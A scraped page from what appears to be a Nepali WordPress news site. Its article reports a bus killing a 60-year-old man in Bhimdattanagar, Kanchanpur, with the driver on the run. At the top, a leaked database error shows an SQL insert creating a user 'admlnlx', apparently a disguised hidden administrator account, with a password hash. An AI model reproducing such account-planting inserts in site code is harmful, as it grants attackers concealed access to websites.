WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeF2s8bWeg.oiC/kqSxo4XtShTajl41', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:25:45', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बसले किचेर वृद्धको मृत्यु – Gaule Khabar

बसले किचेर वृद्धको मृत्यु

बसले किचेर वृद्धको मृत्यु

भीमदत्तनगर,पुस ६-

बसले किचेर आज बिहानै कञ्चनपुरको भीमदत्तनगरमा एक वृद्धको मृत्यु भएको छ ।

घरबाट बसपार्कतर्फ आइरहेको ना ३ ख ७६९४ नम्बरको बसले चम्मन चोकमा किचेर बेदकोट नगरपालिका–८ गैलनदीका ६० वर्षीय राम नाथको मृत्यु भएको जिल्ला प्रहरी कार्यालय कञ्चनपुरले जनाएको छ ।

दुर्घटनापछि फरार रहेका चालकको प्रहरीले खोजीकार्य थालेको छ । प्रहरीले घटनास्थल पुगेर दुर्घटनाबारे विस्तृत अनुसन्धान गरिरहेको जिल्ला प्रहरी कार्यालयले जनाएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका